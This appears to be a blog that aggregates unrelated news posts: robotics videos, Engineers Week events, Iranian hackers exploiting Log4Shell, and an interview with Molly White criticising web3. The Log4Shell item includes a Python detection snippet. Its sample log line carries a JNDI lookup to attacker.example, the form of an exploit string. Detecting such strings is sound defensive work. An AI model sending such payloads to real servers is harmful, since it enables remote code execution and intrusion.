Powerline perching could be an easy way for urban drones to keep their batteries topped up, but landing on powerlines can be tricky. Watch this video until the end to see a drone fly a trajectory to end up in a perching pose underneath a demo line and upside-down!

[ GRVC ]

This finger motion pleases me.

The two chambers of the soft, pneumatic finger are actuated manually, using two large syringes filled with air. Flicking is not a result of fast actuation but of the natural compliance and springiness of the actuator. The compliance inherent to the finger effectively compensates for the inaccuracies in human actuation, leading to robust behavior.

[ TU Berlin ]

Happy Valentine's Day from RightHand Robotics!

Once upon a time two Spots embarked on a mission to find true love. After valiantly overcoming many obstacles, they finally met each other. Sparks were bound to fly in this meeting of the purest hearts. Legend has it that they lived happily ever after.

Sparks flying would be bad, no?

[ Energy Robotics ]

The "new" ASIMO was announced in November of 2011. For a decade-old platform, this performance is still pretty good.

[ YouTube ]

The Apellix Opus X8 Softwash (SW) system cleaning the University of Florida Shands Hospital building in Jacksonville, Florida. The portion of the hospital shown in the video is inaccessible by lifts and impractical to scaffold, and rope access would have been expensive and time-consuming.

[ Apellix ]

NeuroVis is a neural dynamic visualizer that connects to the Robot Operating System (ROS). It acts as a ROS node named “NeuroVis” that receives six topics as inputs: neuron name, connection, updated weight, neuron activity, normalization gain, and bias. In addition, the program can be employed along with a simulation and operates in parallel to the real robot.

[ Brain Lab ]

Thanks, Poramate!

We present the design of a robotic leg that can seamlessly switch between a spring-suspended and an unsuspended configuration. Switching is realized by a lightweight mechanism that exploits the alternative configuration of the two-link leg. This allows us to embed additional functionality in the leg to increase the performance in relation to the locomotion task.

Aerial robots can enhance their safe and agile navigation in complex and cluttered environments by efficiently exploiting the information collected during a given task. In this paper, we address the learning model predictive control problem for quadrotors. We show the effectiveness of the proposed approach in learning a minimum time control task, respecting dynamics, actuators, and environment constraints.

[ ARPL ]

Meet the team that may be least likely to achieve the fastest time at the Self Racing Cars competition at Thunderhill Raceway.

I'm a fan anyway, though!

[ Monarch ] via [ Self Racing Cars ]

AeroVironment’s team of innovative engineers discuss our collaboration with NASA/JPL to design and develop the Ingenuity Mars Helicopter.

[ AeroVironment ]

We are excited to announce the availability of Skydio 2+, our newest drone which adds important battery, range, controller and autonomy software improvements. Ready for Skydio 3D Scan and Skydio Cloud, Skydio 2+ provides the smartest and most efficient solution for accurate asset inspections, small area mapping, and accident scene reconstruction.

[ Skydio ]

A large dust storm on Mars, nearly twice the size of the United States, covered the southern hemisphere of the Red Planet in early January 2022, leading to some of NASA’s explorers on the surface hitting pause on their normal activities. NASA’s Insight lander put itself in a "safe mode" to conserve battery power after dust prevented sunlight from reaching the solar panels. NASA's Ingenuity Mars Helicopter also had to postpone flights until conditions improved.

[ NASA ]

This GRASP on Robotics talk is by Ankur Mehta at the University of California, on "Towards $1 Robots."

Robots are pretty great—they can make some hard tasks easy, some dangerous tasks safe, or some unthinkable tasks possible. And they’re just plain fun to boot. But how many robots have you interacted with recently? And where do you think that puts you compared to the rest of the world’s people? In contrast to computation, automating physical interactions continues to be limited in scope and breadth. I’d like to change that. But in particular, I’d like to do so in a way that’s accessible to everyone, everywhere. In our lab, we work to lower barriers to robotics design, creation, and operation through material and mechanism design, computational tools, and mathematical analysis. We hope that with our efforts, everyone will be soon able to enjoy the benefits of robotics to work, to learn, and to play.

[ UPenn ]

This week's CMU RI Seminar is by Jessica Burgner-Kahrs from University of Toronto, Mississauga, on continuum robots.

[ CMU RI ]

Reference: https://ift.tt/VBeno1y

Ways to Celebrate U.S. Engineers Week

From green energy to efficient transportation to artificial intelligence, engineers develop technologies that change our everyday lives. DiscoverE Engineers Week, being held this year in the United States from 20 to 26 February, celebrates engineers and the way they change the world. It also encourages students to pursue an engineering career and spreads the word about the field.

This year’s EWeek theme is Reimagining the Possible. Activities are happening all week long, with the goal of bringing engineering to the minds of children, their parents, and their educators.

One of the highlights of the week, the Future City competition, draws more than 45,000 students from the United States and abroad. The competition challenges middle-schoolers to imagine, research, design, and build model cities. The top teams from local and regional competitions advance to the finals, which will be held virtually this year. Students compete for a number of coveted awards, which are to be presented during an online event on 23 March.

IEEE-USA sponsors the award for the Most Advanced Smart Grid.

People who are interested in volunteering for Future City can sign up on the event’s website.

Introduce a Girl to Engineering Day, also known as Girl Day, is to be held on 24 February. The worldwide campaign aims to help girls build confidence and to envision STEM careers. Thousands of volunteers act as mentors, facilitate engineering activities, and help empower girls to pursue engineering as a career. Consider signing up to visit a virtual or in-person classroom.

You also can hold your own event, which can be as small as having coffee with a few colleagues, or as big as an organization-wide celebration.

Getting involved can be as simple as joining the conversation on Facebook, Twitter, and Instagram. Use #Eweek2022 and #WhatEngineersDo to share why you value engineering, post photos of your colleagues and research team, and talk about past engineering projects that make you proud.

Posters and graphics from DiscoverE are available as part of the promotional resources at the EWeek website.

You also can advocate for the engineering field by asking your mayor, governor, or congressional representative to issue a proclamation recognizing the contributions of engineers. Another way to get involved is to work with your company to post a message from leadership about the importance of EWeek. Or simply tell a friend what EWeek is and why it’s worth celebrating.

No matter what you do during EWeek, be proud of what you and your colleagues have achieved and what you continue to do to advance technology for humanity.

And don’t forget to celebrate World Engineering Day on 4 March.

Reference: https://ift.tt/Fpny1sO

Trump’s Truth Social Is Poised to Join a Crowded Field

How China Uses Bots and Fake Twitter Accounts to Shape the Olympics

Thursday, February 17, 2022

Google Invests in Skills Training Program for Low-Income Workers

VMware Horizon servers are under active exploit by Iranian state hackers

Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday.

Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision’s heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities—meaning vulnerabilities that have been recently patched—to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group’s better-known targets.

Enter Log4Shell

Recently, SentinelOne reported, TunnelVision has started exploiting a critical vulnerability in Log4j, an open source logging utility that’s integrated into thousands of apps. CVE-2021-44228 (or Log4Shell, as the vulnerability is tracked or nicknamed) allows attackers to easily gain remote control over computers running apps in the Java programming language. The bug bit the Internet’s biggest players and was widely targeted in the wild after it became known.
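As a rough illustration of what defenders look for, Log4Shell exploit attempts typically carry a JNDI lookup string of the form `${jndi:...}` in some field that the application logs. The sketch below is a minimal, naive check for that plain form. The function name and the sample log lines are invented for illustration, and real attacks often obfuscate the string in ways this simple pattern would miss, so it should not be read as a complete detector or as SentinelOne's method.

```python
import re

# Naive pattern for the plain JNDI lookup syntax used in Log4Shell exploit strings.
# Assumption: no obfuscation (nested lookups, encoding tricks) is handled here.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def looks_like_log4shell_probe(line: str) -> bool:
    """Return True if the line contains an unobfuscated JNDI lookup."""
    return JNDI_LOOKUP.search(line) is not None


# Hypothetical log lines, invented for this example.
sample_lines = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${jndi:ldap://attacker.example/a}"',
]

flagged = [line for line in sample_lines if looks_like_log4shell_probe(line)]
print(len(flagged))
```

A match only suggests that someone attempted the exploit; whether a system is actually vulnerable depends on the Log4j version it runs and whether the fix has been installed.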

Wednesday, February 16, 2022

Why you can't rebuild Wikipedia with crypto

Programming note: I’m planning to take Wednesday off the newsletter so I can focus on a panel I’m moderating at Pivot Con in Miami. (I’ll be interviewing Parler CEO George Farmer and GETTR CEO Jason Miller about … a lot of things.) I’ll be back Thursday.

Whenever a fresh disaster happens on the blockchain, increasingly I learn about it from the same destination: a two-month old website whose name suggests the deadpan comedy with which it chronicles the latest crises in NFTs, DAOs, and everything else happening in crypto.

Launched on December 14, Web 3 Is Going Just Great is the sort of thing you almost never see anymore on the internet: a cool and funny new website. Its creator and sole author is Molly White, a software engineer and longtime Wikipedia contributor who combs through news and crypto sites to find the day’s most prominent scams, schemes, and rug pulls.

The site is organized as a timeline and presented in reverse chronological order, and to browse Web 3 Is Going Just Great is to get a sense of just how unusual an industry this is. This week alone, the site (W3IGG to its fans) has highlighted a DAO treasury that was drained in a “hostile takeover”; an NFT project falling apart amid accusations of rug pulling; and Coinbase’s outage during the Super Bowl, among other things.

Scrolling through the items tallies the actual costs of these issues to their victims: A “Grift Counter” in the bottom right corner adds up the value of all the losses to theft and scams that you’ve read about so far.
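The counter described above amounts to a running total over the entries a reader has scrolled past. Here is a minimal sketch of that idea, not the site's actual code: the `Entry` type, the `running_losses` helper, and all titles and dollar amounts are hypothetical and invented for illustration.

```python
from dataclasses import dataclass
from itertools import accumulate


@dataclass
class Entry:
    title: str
    loss_usd: int  # losses attributed to this entry; 0 if none


def running_losses(entries):
    """Return the cumulative loss total after each entry, in reading order."""
    return list(accumulate(entry.loss_usd for entry in entries))


# Hypothetical timeline entries with made-up amounts.
timeline = [
    Entry("Hypothetical rug pull", 1_000_000),
    Entry("Hypothetical exchange outage", 0),
    Entry("Hypothetical treasury drain", 250_000),
]

totals = running_losses(timeline)
# The value at index i is what a counter would show once entry i has been read.
print(totals[-1])
```

Precomputing the cumulative totals means the display only needs to look up one number as the reader scrolls, rather than re-adding every entry each time.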

More than 225,000 people have visited the site to date. It has been featured on Daring Fireball, among other places, and its Twitter account has quickly amassed nearly 23,000 followers.

By White’s own admission, W3IGG has “a strong bias against web3,” and people who are more enthusiastic about crypto may find its one-sided viewpoint unfair. But White’s dryly funny, almost clinical write-ups of crypto crises make it accessible even to open-minded skeptics like myself.

I asked White if she would be up for a conversation, and happily, she agreed. We talked about the site’s origins, her favorite crypto catastrophe, and why she thinks giving people financial stakes in projects will not create a host of new Wikipedia-style projects, as advocates of decentralization often claim.

Casey Newton: When did you first suspect that web3 might not, in fact, be going all that great?

Molly White: Towards the end of 2021 I started to see so much web3 hype, everywhere: on social media, in conversations with friends, in technical spaces, in the news. When I went to look up what "web3" even was, I found no end of articles talking about how one company or another was doing something with web3, or how some venture capital firm was setting up a web3 fund, or how all the problems with the current web were going to be solved by web3… but very few that would actually succinctly describe what the term even meant. This definitely set off the first alarm bells for me: it's concerning to me when people are trying extremely hard to get people to buy in to some new idea but aren't particularly willing (or even able) to describe what it is they're doing. As I began to pay more attention to the space, I was seeing all of this hype for web3 with all these new projects, but so many of them were just absolutely terrible ideas when you got past the marketingspeak and veneer. Medical records on the blockchain! Fix publishing with NFTs! Build social networks on top of immutable databases! I started my Web3 is Going Great project after seeing a few particularly horrendous ideas, as well as after I began to notice just how frequently these hacks and scams were happening (with huge amounts of money involved).

In just the couple months since you launched, we’ve seen entries in all the great genres of crypto whoopsies: the catastrophic hack, the rug pull, the project based on massive copyright infringement. Is there one story in crypto history that you regard as the quintessential “web3 is going great” story?

(Maybe it’s recency bias, but I feel like you could write an entire history of the world based on your recent headline “UN reports that millions of dollars in stolen crypto have gone towards funding North Korean missile programs.”)

I think I'd have to pick the Bitfinex hack. It's got a little bit of everything! Multiple hacks, including of course the infamous August 2016 hack of almost 120,000 bitcoin (worth $72 million at the time, worth several billion today). There's been tons of shady business by executives, some involving Tether, and some of which has led to huge fines in the past year. And of course it's got the "reality is truly stranger than fiction" aspect that makes for some of the best W3IGG entries: the recent discovery of some of those stolen bitcoins as they were allegedly being laundered by a New York couple, one of whom moonlighted as an extremely weird rapper.

Shout out to Razzlekhan.

You’re a longtime editor and administrator of Wikipedia, which is often presented by crypto people as a web3 dream project: a decentralized public good operated by its community. And yet something tells me you think about decentralization and community very differently than they do. How do your experiences at Wikipedia shape the way you view web3?

I think my experiences with the Wikimedia community have given me a pretty realistic view of how wonderful but also how difficult community-run projects can be. There are some issues that community-driven projects are prone to running up against: deciding issues when the community is split, dealing with abuse and harassment within the community, handling outside players with a strong interest in influencing what the community does. I think this is partly why some of the best critics of web3 have backgrounds in communities like Wikimedia and open source—they are familiar with the challenges that community governance and decentralization can bring. When I watch DAOs spring into existence and encounter a lot of the same difficulties we've seen over and over again, I often find myself wondering how many members have ever been involved in community-run projects in the past. I think a lot of people are dipping their toes in for the first time, and learning a lot of things the hard way, with very high stakes.

Web3 also adds an enormous amount of complexity on top of the already-complex types of issues that the Wikimedia community has faced, because there's money involved. The non-profit Wikimedia Foundation handles most of the finances with respect to Wikipedia, and so although the community has input, it's largely not a day-to-day concern. There also aren't really intrinsic monetary incentives for people to contribute to Wikipedia, which I think is a very good thing. Where people are paid to edit Wikipedia by outside parties, it warps the incentive to contribute into one that's very different from (and sometimes at odds with) the incentives for most community members, and is often a very negative thing. Our community has actually spent a lot of time discussing how to handle paid editors, and has even considered trying to prohibit the practice completely. The majority of people contributing to Wikipedia are doing so out of a desire to improve an encyclopedic resource. With web3 you have a whole mix of motivations, including wanting to support a specific project, wanting to do good in various broader ways, and just wanting to make a lot of money. Those things can be in conflict a lot of the time.

Crypto enthusiasts often respond to that argument by saying something like — of course Wikipedia contributors should be paid! They’re creating a massive amount of value. And (the argument goes) we might have a lot more Wikipedia-style projects in the world, if only we could properly incentivize them. What’s your view on that?

I'd invite them to take a look at any of the Wikipedia-like projects that have tried to do exactly this. Everipedia is probably the most well-known example, and it's been around since 2014. They've had seven years to figure it out, but the project is largely still a graveyard of content they've just scraped off Wikipedia, articles that people have written about themselves, and, increasingly, crypto spam. I looked at their recent activity page just now, and two editors have made six edits in the past hour. As I write this, people are making 160 edits per minute just to the English language Wikipedia—700 per minute across all languages. If you look at their recent blog posts, it's all about how many tokens their editors have supposedly earned, and it even brags about the fact that "Over 70% of stakers have locked their IQ up for over 3.5 years to earn max APR". This is the same token that people are supposed to be spending to edit and vote on the quality of edits, but they're excited that people are locking them up on staking platforms? The goal is not to create a reference work, it's to make money off the token.

Speaking more broadly, monetizing things just shifts the dynamics in enormous ways. We've seen this same thing happen with play-to-earn gaming, where people start doing things really differently when monetary incentives are added.

A lot of writing about web3 is highly polarized — either hugely enthusiastic or violently opposed. Then your site came along and said, in an understated way, this is all just pretty funny. How did you arrive at the site’s tone?

The website definitely has a strong bias against web3, which I think surprised some people who know me as a Wikipedian. I've had to tell a few people that if my goal was to write about web3 from a purely encyclopedic perspective, I would go do it on Wikipedia. That said, because so much of my writing in the past decade or so has taken the form of Wikipedia articles, I often find myself falling back on that sort of detached encyclopedic style, and I think that's evident in W3IGG. The site definitely reflects my opinions in the choice of entries, and in some of the snark or commentary that I do add to some of the entries, but the main goal of any entry is to give a fairly factual recounting of what happened.

I think there's also a lot of value in giving short, digestible descriptions of the types of things that are happening in web3, without delving too deep into the technology or specifics. I've done some longer-form writing about web3 and crypto, and I've realized that you either have to assume that your readers already know what blockchains and NFTs and DAOs and proof-of-work and a whole host of other things are, or you have to spend a huge amount of time defining all these things before you can even make your point. Depending what you're writing about you also might have to go into a lot of economic or political concepts and theory, too. People have to be willing to invest a lot of time and brainpower into understanding even pretty surface-level analyses of web3, and I think a lot of people just click away. Presenting a list of short and tangible examples of web3 projects, and using those to highlight the flaws with the space, has been really effective because a layperson can stumble across the site and enjoy an entry or two without needing too much background. That's not to speak negatively of the many wonderful and deep analyses of web3 that are out there—W3IGG would absolutely not exist without that incredible research and writing, and I've tried to do some of my own too—but I think W3IGG appeals to a somewhat different audience. I hope it also draws people in to learn more about the space and engage with some of the more thoughtful criticism.

In January you wrote an excellent blog post about the way that blockchains can enable abuse, harassment, surveillance, and other ills. When I asked my readers who is working to address these issues, I was shocked at how few responses I got. Do you think the inattention is the usual history repeating itself, or are the technological challenges harder than people realize?

History is definitely repeating itself with web3. We've already seen repeats of history in a lot of ways: projects being exploited for failing to follow what are normally the most fundamental software security practices, or people falling for fraudulent schemes that have existed for ages but have been adapted to use web3 technology. I think a lot of people are so eager to innovate and make money that they aren't slowing down to consider the structural problems that really need considering.

It's also a deeply complicated subject, and I doubt there are any people who have a deep understanding of all of the topics that web3 projects often have to consider: the technology, sure, but also security, economics, sociology, politics, law… So everyone is operating with various levels of knowledge in some subset of those things, and it's easy for considerations to be missed. In a lot of ways, people are also tying themselves to the technology in ways that I haven't really seen before. You don't see a lot of people pick a type of data model—say a linked list—and say "okay, how can I solve [x problem] with a linked list?" But that's exactly what's happening in web3: "How can I solve selling real estate with a blockchain?" "How can I solve voting integrity with a blockchain?" And inevitably some of these people are more tied to the idea of blockchains than they are to solving their chosen problems in a good way.

I think there is a third factor at play, too, which is that a lot of people in web3 seem unusually hostile to skepticism, criticism, or even alternate points of view. Some web3 communities have become resistant to people even asking questions simply to understand the projects better, and people end up walking on eggshells so they aren't seen to be "spreading FUD" or not believing in a project. This is such a dangerous attitude to have, because all technologies need skeptics! And when people aren't listening to different points of view, they're missing such important information. I think one of the huge reasons that questions about abuse and harassment in web3 projects have gone largely unaddressed is that the people who have to face the worst of it, members of marginalized groups, are underrepresented in web3 communities and among web3 skeptics. But without those perspectives, and without people asking the hard questions early on, people developing any technology are doomed to find themselves trying to tack on fixes to existing systems after people have already been harmed.

I try to approach web3 stuff with open-minded skepticism. On one hand, you have every story ever featured on W3IGG. On the other hand, so much of the energy and talent and money in tech right now is racing toward crypto at 100 mph. How plausible is it to you that something actually great might come out of web3?

I don't see a future for web3, and I am quite critical of it. But I do acknowledge that despite the very negative things I've highlighted about it, there are some positives. It's drawing attention to a lot of things that I am delighted to see highlighted: community-driven projects, community organizing, and open source software, to name a few. It's also drawing a lot of people in to get involved with tech, often from new backgrounds (artists, for example), and that's great. I am hoping that even if web3 turns out to be a disaster, and I do think it will, some of those people stick around, and keep going with open source software and community-driven projects without all of the blockchain bullshit. That could be very powerful.

As far as specific projects go, if anything good comes out of web3, I expect it will emerge despite the technologies rather than as a result of them. There are all kinds of people trying to solve very real problems, but they are putting all their eggs in one basket: a type of datastore that's often very expensive and inefficient, and which introduces complexities around decentralization, immutability, and privacy that many projects will find impossible to overcome.

: Reference

https://www.platformer.news/p/why-you-cant-rebuild-wikipedia-with
